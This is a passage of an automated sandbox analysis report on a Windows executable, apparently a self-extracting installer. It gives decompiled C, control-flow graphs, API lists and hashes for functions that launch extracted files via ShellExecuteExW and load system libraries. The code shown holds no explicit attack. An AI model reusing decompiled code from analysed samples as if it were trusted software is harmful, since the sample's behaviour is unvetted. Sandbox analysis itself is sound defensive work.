                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: _wcslen$ByteCharFileH_prologModuleMultiNameWide__fprintf_l_wcschr
                • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$R$RTL$a$9@
                • API String ID: 557298264-3393531270
                • Opcode ID: 324286c69d8c6b4d10f6457fd898983ae0fc0d2c52c98324c8c469048a3e6123
                • Instruction ID: 33ffcf95f1d848aec6278d1b2ce88d88f360692ab20d511fc5d0d67f7421b1ab
                • Opcode Fuzzy Hash: 324286c69d8c6b4d10f6457fd898983ae0fc0d2c52c98324c8c469048a3e6123
                • Instruction Fuzzy Hash: ED32D173A00218ABCF26EF64E841BEA7BA9FF14700F41456BF9059B391E7B19985CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003ED4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                Download Yara Rule

                Control-flow Graph

                C-Code - Quality: 100%
                			E003ED4D4() {
				intOrPtr _t41;
				intOrPtr _t44;
				struct HWND__* _t46;
				void* _t48;
				char _t49;

				E003EB568(); // executed
				_t46 = GetDlgItem( *0x418458, 0x68);
				_t49 =  *0x418463; // 0x1
				if(_t49 == 0) {
					_t44 =  *0x418440; // 0x0
					E003E9285(_t44);
					ShowWindow(_t46, 5); // executed
					SendMessageW(_t46, 0xb1, 0, 0xffffffff);
					SendMessageW(_t46, 0xc2, 0, 0x4035f4);
					 *0x418463 = 1;
				}
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				 *(_t48 + 0x10) = 0x5c;
				SendMessageW(_t46, 0x43a, 0, _t48 + 0x10);
				 *((char*)(_t48 + 0x29)) = 0;
				_t41 =  *((intOrPtr*)(_t48 + 0x70));
				 *((intOrPtr*)(_t48 + 0x14)) = 1;
				if(_t41 != 0) {
					 *((intOrPtr*)(_t48 + 0x24)) = 0xa0;
					 *((intOrPtr*)(_t48 + 0x14)) = 0x40000001;
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xbfffffff | 1;
				}
				SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				SendMessageW(_t46, 0xc2, 0,  *(_t48 + 0x74));
				SendMessageW(_t46, 0xb1, 0x5f5e100, 0x5f5e100);
				if(_t41 != 0) {
					 *(_t48 + 0x18) =  *(_t48 + 0x18) & 0xfffffffe | 0x40000000;
					SendMessageW(_t46, 0x444, 1, _t48 + 0x10);
				}
				return SendMessageW(_t46, 0xc2, 0, L"\r\n");
			}








                0x003ed4db
                0x003ed4f5
                0x003ed4fa
                0x003ed500
                0x003ed502
                0x003ed508
                0x003ed510
                0x003ed51b
                0x003ed529
                0x003ed52f
                0x003ed52f
                0x003ed53f
                0x003ed549
                0x003ed559
                0x003ed561
                0x003ed565
                0x003ed56a
                0x003ed570
                0x003ed57b
                0x003ed585
                0x003ed58d
                0x003ed58d
                0x003ed59d
                0x003ed5ab
                0x003ed5ba
                0x003ed5c2
                0x003ed5d0
                0x003ed5e1
                0x003ed5e1
                0x003ed5fd

                APIs
                  • Part of subcall function 003EB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003EB579
                  • Part of subcall function 003EB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003EB58A
                  • Part of subcall function 003EB568: IsDialogMessageW.USER32(000303F2,?), ref: 003EB59E
                  • Part of subcall function 003EB568: TranslateMessage.USER32(?), ref: 003EB5AC
                  • Part of subcall function 003EB568: DispatchMessageW.USER32(?), ref: 003EB5B6
                • GetDlgItem.USER32(00000068,0042FCB8), ref: 003ED4E8
                • ShowWindow.USER32(00000000,00000005,?,?,?,003EAF07,00000001,?,?,003EB7B9,0040506C,0042FCB8,0042FCB8,00001000,00000000,00000000), ref: 003ED510
                • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 003ED51B
                • SendMessageW.USER32(00000000,000000C2,00000000,004035F4), ref: 003ED529
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 003ED53F
                • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 003ED559
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 003ED59D
                • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 003ED5AB
                • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 003ED5BA
                • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 003ED5E1
                • SendMessageW.USER32(00000000,000000C2,00000000,004043F4), ref: 003ED5F0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                • String ID: \
                • API String ID: 3569833718-2967466578
                • Opcode ID: e7859d428c4ccb5ccbf33a1a26c6d43f123547b3a50316709262cdeba1b7f060
                • Instruction ID: acb6c7cb21e72a0059bf1925633ee1cee3ba5990e47b5fa026c6d19bf901bd22
                • Opcode Fuzzy Hash: e7859d428c4ccb5ccbf33a1a26c6d43f123547b3a50316709262cdeba1b7f060
                • Instruction Fuzzy Hash: 2231C471145342BFE301DF20DC4AFAB7FACEB86705F004529F651961D0EB759A048B7A
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003ED78F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 184COMMON
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 812 3ed78f-3ed7a7 call 3eec50 815 3ed7ad-3ed7b9 call 3f3e13 812->815 816 3ed9e8-3ed9f0 812->816 815->816 819 3ed7bf-3ed7e7 call 3efff0 815->819 822 3ed7e9 819->822 823 3ed7f1-3ed7ff 819->823 822->823 824 3ed812-3ed818 823->824 825 3ed801-3ed804 823->825 827 3ed85b-3ed85e 824->827 826 3ed808-3ed80e 825->826 829 3ed837-3ed844 826->829 830 3ed810 826->830 827->826 828 3ed860-3ed866 827->828 833 3ed86d-3ed86f 828->833 834 3ed868-3ed86b 828->834 831 3ed84a-3ed84e 829->831 832 3ed9c0-3ed9c2 829->832 835 3ed822-3ed82c 830->835 838 3ed9c6 831->838 839 3ed854-3ed859 831->839 832->838 840 3ed882-3ed898 call 3db92d 833->840 841 3ed871-3ed878 833->841 834->833 834->840 836 3ed82e 835->836 837 3ed81a-3ed820 835->837 836->829 837->835 844 3ed830-3ed833 837->844 845 3ed9cf 838->845 839->827 848 3ed89a-3ed8a7 call 3e1fbb 840->848 849 3ed8b1-3ed8bc call 3da231 840->849 841->840 842 3ed87a 841->842 842->840 844->829 847 3ed9d6-3ed9d8 845->847 851 3ed9da-3ed9dc 847->851 852 3ed9e7 847->852 848->849 857 3ed8a9 848->857 858 3ed8be-3ed8d5 call 3db6c4 849->858 859 3ed8d9-3ed8e6 ShellExecuteExW 849->859 851->852 856 3ed9de-3ed9e1 ShowWindow 851->856 852->816 856->852 857->849 858->859 859->852 861 3ed8ec-3ed8f9 859->861 863 3ed90c-3ed90e 861->863 864 3ed8fb-3ed902 861->864 866 3ed925-3ed944 call 3edc3b 863->866 867 3ed910-3ed919 863->867 864->863 865 3ed904-3ed90a 864->865 865->863 868 3ed97b-3ed987 CloseHandle 865->868 866->868 881 3ed946-3ed94e 866->881 867->866 874 3ed91b-3ed923 ShowWindow 867->874 870 3ed998-3ed9a6 868->870 871 3ed989-3ed996 call 3e1fbb 868->871 870->847 873 3ed9a8-3ed9aa 870->873 871->845 871->870 873->847 877 3ed9ac-3ed9b2 873->877 874->866 877->847 880 3ed9b4-3ed9be 877->880 880->847 881->868 882 3ed950-3ed961 GetExitCodeProcess 881->882 882->868 883 3ed963-3ed96d 882->883 884 3ed96f 883->884 885 3ed974 883->885 884->885 885->868
                C-Code - Quality: 81%
                			E003ED78F(void* __ebp, struct _SHELLEXECUTEINFOW _a4, char* _a8, char* _a16, signed short* _a20, signed short* _a24, intOrPtr _a32, void* _a48, char _a52, intOrPtr _a56, char _a64, struct HWND__* _a4160, void* _a4164, signed short* _a4168, intOrPtr _a4172, intOrPtr _a4176) {
				long _v12;
				void* __edi;
				int _t47;
				signed int _t50;
				void* _t51;
				signed short* _t53;
				long _t64;
				signed int _t71;
				void* _t72;
				signed short _t73;
				int _t74;
				void* _t76;
				signed int _t77;
				intOrPtr _t78;
				long _t80;
				signed int _t81;
				void* _t82;
				void* _t84;
				signed int _t86;
				signed short* _t87;
				struct HWND__* _t88;
				void* _t89;
				void* _t92;

				_t89 = __ebp;
				_t47 = E003EEC50(0x1040);
				_t87 = _a4168;
				_t74 = 0;
				if( *_t87 == 0) {
					L54:
					return _t47;
				}
				_t47 = E003F3E13(_t87);
				if(_t47 >= 0x7f6) {
					goto L54;
				} else {
					_t80 = 0x3c;
					E003EFFF0(_t80,  &_a4, 0, _t80);
					_t78 = _a4176;
					_t92 = _t92 + 0xc;
					_a4.cbSize = _t80;
					_a8 = 0x1c0;
					if(_t78 != 0) {
						_a8 = 0x5c0;
					}
					_t50 =  *_t87 & 0x0000ffff;
					_push(_t89);
					_t76 = 0x22;
					_t81 = _t50;
					_t77 = _t74;
					if(_t50 != _t76) {
						_t90 = _t87;
						_a20 = _t87;
						goto L16;
					} else {
						_t90 =  &(_t87[1]);
						_a20 =  &(_t87[1]);
						L6:
						_t51 = 0x22;
						if(_t81 != _t51) {
							L13:
							_t82 = 0x20;
							_t53 =  &(( &(_t87[1]))[_t77]);
							if(_t87[_t77] == _t82) {
								_t87[_t77] = 0;
								L48:
								_a24 = _t53;
								L18:
								if(_t53 == 0 ||  *_t53 == _t74) {
									if(_t78 == 0 &&  *0x41b472 != _t74) {
										_a24 = 0x41b472;
									}
								}
								_a32 = _a4172;
								_t84 = E003DB92D(_t90);
								if(_t84 != 0 && E003E1FBB(_t84, L".inf") == 0) {
									_a16 = L"Install";
								}
								if(E003DA231(_a20) != 0) {
									E003DB6C4(_a20,  &_a64, 0x800);
									_a8 =  &_a52;
								}
								_t47 = ShellExecuteExW( &_a4); // executed
								if(_t47 != 0) {
									_t88 = _a4160;
									if( *0x419468 != _t74 || _a4172 != _t74 ||  *0x427b7a != _t74) {
										if(_t88 != 0) {
											_push(_t88);
											if( *0x4330a8() != 0) {
												ShowWindow(_t88, _t74);
												_t74 = 1;
											}
										}
										 *0x4330a4(_a56, 0x7d0);
										E003EDC3B(_a48);
										if( *0x427b7a != 0 && _a4164 == 0 && GetExitCodeProcess(_a48,  &_v12) != 0) {
											_t64 = _v12;
											if(_t64 >  *0x42fca4) {
												 *0x42fca4 = _t64;
											}
											 *0x427b7b = 1;
										}
									}
									CloseHandle(_a48);
									if(_t84 == 0 || E003E1FBB(_t84, L".exe") != 0) {
										_t47 = _a4164;
										if( *0x419468 != 0 && _t47 == 0 &&  *0x427b7a == _t47) {
											 *0x42fca8 = 0x1b58;
										}
									} else {
										_t47 = _a4164;
									}
									if(_t74 != 0 && _t47 != 0) {
										_t47 = ShowWindow(_t88, 1);
									}
								}
								goto L54;
							}
							if( *_t53 == 0x2f) {
								goto L48;
							}
							_t77 = _t77 + 1;
							_t50 = _t87[_t77] & 0x0000ffff;
							_t81 = _t50;
							L16:
							if(_t50 != 0) {
								goto L6;
							}
							_t53 = _a24;
							goto L18;
						} else {
							while(1) {
								_t77 = _t77 + 1;
								_t71 = _t87[_t77] & 0x0000ffff;
								_t86 = _t71;
								if(_t71 == 0) {
									break;
								}
								_t72 = 0x22;
								if(_t86 == _t72) {
									_t73 = 0x20;
									_t87[_t77] = _t73;
									goto L13;
								}
							}
							goto L13;
						}
					}
				}
			}


























                0x003ed78f
                0x003ed794
                0x003ed79b
                0x003ed7a2
                0x003ed7a7
                0x003ed9ea
                0x003ed9f0
                0x003ed9f0
                0x003ed7ae
                0x003ed7b9
                0x00000000
                0x003ed7bf
                0x003ed7c2
                0x003ed7ca
                0x003ed7cf
                0x003ed7d6
                0x003ed7d9
                0x003ed7dd
                0x003ed7e7
                0x003ed7e9
                0x003ed7e9
                0x003ed7f1
                0x003ed7f4
                0x003ed7f7
                0x003ed7fb
                0x003ed7fd
                0x003ed7ff
                0x003ed812
                0x003ed814
                0x00000000
                0x003ed801
                0x003ed801
                0x003ed804
                0x003ed808
                0x003ed80a
                0x003ed80e
                0x003ed837
                0x003ed839
                0x003ed83d
                0x003ed844
                0x003ed9c2
                0x003ed9c6
                0x003ed9c6
                0x003ed864
                0x003ed866
                0x003ed86f
                0x003ed87a
                0x003ed87a
                0x003ed86f
                0x003ed88a
                0x003ed893
                0x003ed898
                0x003ed8a9
                0x003ed8a9
                0x003ed8bc
                0x003ed8cc
                0x003ed8d5
                0x003ed8d5
                0x003ed8de
                0x003ed8e6
                0x003ed8ec
                0x003ed8f9
                0x003ed90e
                0x003ed910
                0x003ed919
                0x003ed91d
                0x003ed923
                0x003ed923
                0x003ed919
                0x003ed92e
                0x003ed938
                0x003ed944
                0x003ed963
                0x003ed96d
                0x003ed96f
                0x003ed96f
                0x003ed974
                0x003ed974
                0x003ed944
                0x003ed97f
                0x003ed987
                0x003ed99f
                0x003ed9a6
                0x003ed9b4
                0x003ed9b4
                0x003ed9cf
                0x003ed9cf
                0x003ed9cf
                0x003ed9d8
                0x003ed9e1
                0x003ed9e1
                0x003ed9d8
                0x00000000
                0x003ed9e7
                0x003ed84e
                0x00000000
                0x00000000
                0x003ed854
                0x003ed855
                0x003ed859
                0x003ed85b
                0x003ed85e
                0x00000000
                0x00000000
                0x003ed860
                0x00000000
                0x003ed810
                0x003ed822
                0x003ed822
                0x003ed823
                0x003ed827
                0x003ed82c
                0x00000000
                0x00000000
                0x003ed81c
                0x003ed820
                0x003ed832
                0x003ed833
                0x00000000
                0x003ed833
                0x003ed820
                0x00000000
                0x003ed82e
                0x003ed80e
                0x003ed7ff

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: ShowWindow$CloseCodeExecuteExitHandleProcessShell_wcslen
                • String ID: .exe$.inf$h>$r>
                • API String ID: 36480843-509201921
                • Opcode ID: 6b528898715e24b67e41555761385cc469d5dbedd45e56dacaef9ce6e10323a8
                • Instruction ID: eae795e4e27def680709a7ae4a749ce5e8348a2c52277c5e475e215d01648e8a
                • Opcode Fuzzy Hash: 6b528898715e24b67e41555761385cc469d5dbedd45e56dacaef9ce6e10323a8
                • Instruction Fuzzy Hash: 1E51F4711043D09AEB329F26DC40BABBBE4AF41744F05062EF9C49B1D2D7709D85CB56
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003F3B72 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 911 3f3b72-3f3b7c 912 3f3bee-3f3bf1 911->912 913 3f3b7e-3f3b8c 912->913 914 3f3bf3 912->914 915 3f3b8e-3f3b91 913->915 916 3f3b95-3f3bb1 LoadLibraryExW 913->916 917 3f3bf5-3f3bf9 914->917 918 3f3c09-3f3c0b 915->918 919 3f3b93 915->919 920 3f3bfa-3f3c00 916->920 921 3f3bb3-3f3bbc GetLastError 916->921 918->917 922 3f3beb 919->922 920->918 925 3f3c02-3f3c03 FreeLibrary 920->925 923 3f3bbe-3f3bd3 call 3f6088 921->923 924 3f3be6-3f3be9 921->924 922->912 923->924 928 3f3bd5-3f3be4 LoadLibraryExW 923->928 924->922 925->918 928->920 928->924
                C-Code - Quality: 100%
                			E003F3B72(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x4320e0 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x4062b4 + _t11 * 4);
						_v8 = _t12;
						_t13 = LoadLibraryExW(_t12, 0, 0x800); // executed
						_t29 = _t13;
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t7 =  &_v8; // 0x3f2a63
						_t31 =  *_t7;
						_t18 = E003F6088(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}














                0x003f3b79
                0x003f3bee
                0x003f3b7e
                0x003f3b80
                0x003f3b87
                0x003f3b8c
                0x003f3b95
                0x003f3ba4
                0x003f3ba7
                0x003f3bad
                0x003f3bb1
                0x003f3bfa
                0x003f3bfc
                0x003f3c00
                0x003f3c03
                0x003f3c03
                0x003f3c09
                0x003f3c09
                0x003f3bf5
                0x003f3bf9
                0x003f3bf9
                0x003f3bb3
                0x003f3bbc
                0x003f3be6
                0x003f3be9
                0x003f3beb
                0x003f3beb
                0x00000000
                0x003f3beb
                0x003f3bbe
                0x003f3bbe
                0x003f3bc9
                0x003f3bce
                0x003f3bd3
                0x00000000
                0x00000000
                0x003f3bda
                0x003f3be0
                0x003f3be4
                0x00000000
                0x00000000
                0x00000000
                0x003f3be4
                0x003f3b91
                0x00000000
                0x00000000
                0x00000000
                0x003f3b93
                0x003f3bf3
                0x00000000

                APIs
                • FreeLibrary.KERNEL32(00000000,?,?,003F3C35,00000000,00000FA0,00432088,00000000,?,003F3D60,00000004,InitializeCriticalSectionEx,00406394,InitializeCriticalSectionEx,00000000), ref: 003F3C03
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: FreeLibrary
                • String ID: api-ms-$c*?
                • API String ID: 3664257935-2087528462
                • Opcode ID: 85ac54919f156d7f86bcc59b7cf48e5e399f2a2c8ab7fec172749823fa3a8fac
                • Instruction ID: d0b843ed08efa052784077c029c51a39bd9b36ee03a61d0d478b944c5e125241
                • Opcode Fuzzy Hash: 85ac54919f156d7f86bcc59b7cf48e5e399f2a2c8ab7fec172749823fa3a8fac
                • Instruction Fuzzy Hash: 18112C31A05229ABCB238BA89C51B6D3B689F01770F220160FE11FB2D0D774EF0086D4
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003FA95B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 929 3fa95b-3fa974 930 3fa98a-3fa98f 929->930 931 3fa976-3fa986 call 3fef4c 929->931 933 3fa99c-3fa9c0 MultiByteToWideChar 930->933 934 3fa991-3fa999 930->934 931->930 938 3fa988 931->938 936 3fa9c6-3fa9d2 933->936 937 3fab53-3fab66 call 3efbbc 933->937 934->933 939 3faa26 936->939 940 3fa9d4-3fa9e5 936->940 938->930 943 3faa28-3faa2a 939->943 944 3fa9e7-3fa9f6 call 402010 940->944 945 3faa04-3faa15 call 3f8e06 940->945 947 3fab48 943->947 948 3faa30-3faa43 MultiByteToWideChar 943->948 944->947 954 3fa9fc-3faa02 944->954 945->947 955 3faa1b 945->955 953 3fab4a-3fab51 call 3fabc3 947->953 948->947 952 3faa49-3faa5b call 3faf6c 948->952 959 3faa60-3faa64 952->959 953->937 958 3faa21-3faa24 954->958 955->958 958->943 959->947 961 3faa6a-3faa71 959->961 962 3faaab-3faab7 961->962 963 3faa73-3faa78 961->963 964 3faab9-3faaca 962->964 965 3fab03 962->965 963->953 966 3faa7e-3faa80 963->966 969 3faacc-3faadb call 402010 964->969 970 3faae5-3faaf6 call 3f8e06 964->970 967 3fab05-3fab07 965->967 966->947 968 3faa86-3faaa0 call 3faf6c 966->968 971 3fab09-3fab22 call 3faf6c 967->971 972 3fab41-3fab47 call 3fabc3 967->972 968->953 982 3faaa6 968->982 969->972 984 3faadd-3faae3 969->984 970->972 985 3faaf8 970->985 971->972 986 3fab24-3fab2b 971->986 972->947 982->947 987 3faafe-3fab01 984->987 985->987 988 3fab2d-3fab2e 986->988 989 3fab67-3fab6d 986->989 987->967 990 3fab2f-3fab3f WideCharToMultiByte 988->990 989->990 990->972 991 3fab6f-3fab76 call 3fabc3 990->991 991->953
                C-Code - Quality: 70%
                			E003FA95B(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t57;
				signed int _t59;
				short* _t61;
				signed int _t65;
				short* _t70;
				int _t79;
				void* _t81;
				short* _t82;
				signed int _t88;
				signed int _t91;
				void* _t96;
				int _t98;
				void* _t99;
				short* _t101;
				int _t103;
				void* _t104;
				int _t105;
				signed int _t106;
				short* _t107;
				void* _t110;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x40e7ac; // 0xc24f6281
				_v8 = _t49 ^ _t106;
				_t103 = _a20;
				if(_t103 > 0) {
					_t79 = E003FEF4C(_a16, _t103);
					_t110 = _t79 - _t103;
					_t4 = _t79 + 1; // 0x1
					_t103 = _t4;
					if(_t110 >= 0) {
						_t103 = _t79;
					}
				}
				_t98 = _a32;
				if(_t98 == 0) {
					_t98 =  *( *_a4 + 8);
					_a32 = _t98;
				}
				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t99);
					_pop(_t104);
					_pop(_t81);
					return E003EFBBC(_t54, _t81, _v8 ^ _t106, _t96, _t99, _t104);
				} else {
					_t96 = _t54 + _t54;
					_t86 = _t96 + 8;
					asm("sbb eax, eax");
					if((_t96 + 0x00000008 & _t54) == 0) {
						_t82 = 0;
						__eflags = 0;
						L14:
						if(_t82 == 0) {
							L36:
							_t105 = 0;
							L37:
							E003FABC3(_t82);
							_t54 = _t105;
							goto L38;
						}
						_t57 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t82, _v12);
						_t121 = _t57;
						if(_t57 == 0) {
							goto L36;
						}
						_t100 = _v12;
						_t59 = E003FAF6C(_t82, _t86, _v12, _t121, _a8, _a12, _t82, _v12, 0, 0, 0, 0, 0); // executed
						_t105 = _t59;
						if(_t105 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t96 = _t105 + _t105;
							_t88 = _t96 + 8;
							__eflags = _t96 - _t88;
							asm("sbb eax, eax");
							__eflags = _t88 & _t59;
							if((_t88 & _t59) == 0) {
								_t101 = 0;
								__eflags = 0;
								L30:
								__eflags = _t101;
								if(__eflags == 0) {
									L35:
									E003FABC3(_t101);
									goto L36;
								}
								_t61 = E003FAF6C(_t82, _t88, _t101, __eflags, _a8, _a12, _t82, _v12, _t101, _t105, 0, 0, 0);
								__eflags = _t61;
								if(_t61 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
								__eflags = _t105;
								if(_t105 != 0) {
									E003FABC3(_t101);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t91 = _t96 + 8;
							__eflags = _t96 - _t91;
							asm("sbb eax, eax");
							_t65 = _t59 & _t91;
							_t88 = _t96 + 8;
							__eflags = _t65 - 0x400;
							if(_t65 > 0x400) {
								__eflags = _t96 - _t88;
								asm("sbb eax, eax");
								_t101 = E003F8E06(_t88, _t65 & _t88);
								_pop(_t88);
								__eflags = _t101;
								if(_t101 == 0) {
									goto L35;
								}
								 *_t101 = 0xdddd;
								L28:
								_t101 =  &(_t101[4]);
								goto L30;
							}
							__eflags = _t96 - _t88;
							asm("sbb eax, eax");
							E00402010(_t65 & _t88);
							_t101 = _t107;
							__eflags = _t101;
							if(_t101 == 0) {
								goto L35;
							}
							 *_t101 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t125 = _t105 - _t70;
						if(_t105 > _t70) {
							goto L36;
						}
						_t105 = E003FAF6C(_t82, 0, _t100, _t125, _a8, _a12, _t82, _t100, _a24, _t70, 0, 0, 0);
						if(_t105 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t96 + 0x00000008;
					_t86 = _t96 + 8;
					if((_t54 & _t96 + 0x00000008) > 0x400) {
						__eflags = _t96 - _t86;
						asm("sbb eax, eax");
						_t82 = E003F8E06(_t86, _t72 & _t86);
						_pop(_t86);
						__eflags = _t82;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t82 = 0xdddd;
						L12:
						_t82 =  &(_t82[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E00402010(_t72 & _t86);
					_t82 = _t107;
					if(_t82 == 0) {
						goto L36;
					}
					 *_t82 = 0xcccc;
					goto L12;
				}
			}































                0x003fa960
                0x003fa961
                0x003fa962
                0x003fa969
                0x003fa96e
                0x003fa974
                0x003fa97a
                0x003fa980
                0x003fa983
                0x003fa983
                0x003fa986
                0x003fa988
                0x003fa988
                0x003fa986
                0x003fa98a
                0x003fa98f
                0x003fa996
                0x003fa999
                0x003fa999
                0x003fa9b5
                0x003fa9bb
                0x003fa9c0
                0x003fab53
                0x003fab56
                0x003fab57
                0x003fab58
                0x003fab66
                0x003fa9c6
                0x003fa9c6
                0x003fa9c9
                0x003fa9ce
                0x003fa9d2
                0x003faa26
                0x003faa26
                0x003faa28
                0x003faa2a
                0x003fab48
                0x003fab48
                0x003fab4a
                0x003fab4b
                0x003fab51
                0x00000000
                0x003fab51
                0x003faa3b
                0x003faa41
                0x003faa43
                0x00000000
                0x00000000
                0x003faa49
                0x003faa5b
                0x003faa60
                0x003faa64
                0x00000000
                0x00000000
                0x003faa71
                0x003faaab
                0x003faaae
                0x003faab1
                0x003faab3
                0x003faab5
                0x003faab7
                0x003fab03
                0x003fab03
                0x003fab05
                0x003fab05
                0x003fab07
                0x003fab41
                0x003fab42
                0x00000000
                0x003fab47
                0x003fab1b
                0x003fab20
                0x003fab22
                0x00000000
                0x00000000
                0x003fab26
                0x003fab27
                0x003fab28
                0x003fab2b
                0x003fab67
                0x003fab6a
                0x003fab2d
                0x003fab2d
                0x003fab2e
                0x003fab2e
                0x003fab3b
                0x003fab3d
                0x003fab3f
                0x003fab70
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x003fab3f
                0x003faab9
                0x003faabc
                0x003faabe
                0x003faac0
                0x003faac2
